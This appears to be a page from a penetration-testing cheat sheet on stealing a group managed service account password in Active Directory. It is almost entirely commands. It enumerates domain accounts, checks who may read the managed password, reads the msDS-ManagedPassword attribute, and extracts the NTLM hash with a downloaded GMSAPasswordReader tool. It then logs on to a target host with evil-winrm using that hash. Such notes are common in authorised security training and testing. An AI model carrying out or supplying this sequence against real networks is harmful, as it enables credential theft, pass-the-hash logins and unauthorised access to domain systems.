GMSA password retrieval

Enumeration

# Target machine
# Check domain username and see any service account
PS> net users /domain 

# Check svc_apache properties
PS> Get-ADServiceAccount -Identity 'svc_apache$' -Properties *

# Enumerate if you can get a password from the service account
PS> Get-ADServiceAccount -Identity 'svc_apache$' -Properties * | Select PrincipalsAllowedToRetrieveManagedPassword

# Check if you can get a password hash
get-ADServiceAccount -Identity 'svc_apache$' -Properties 'msDS-ManagedPassword'
$gmsa = Get-ADServiceAccount -Identity 'svc_apache$' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
$mp

Get Password Hash

# https://github.com/CsEnox/tools/raw/main/GMSAPasswordReader.exe

PS> ./GMSAPasswordReader.exe --accountname svc_apache

Logon to the target machine

# winrm example
evil-winrm -i 192.168.174.165 -u svc_apache$ -H 41BCD07B8CC9636826FE07FF9539CA57

PreviousPotato NextLAPS password

Last updated 9 months ago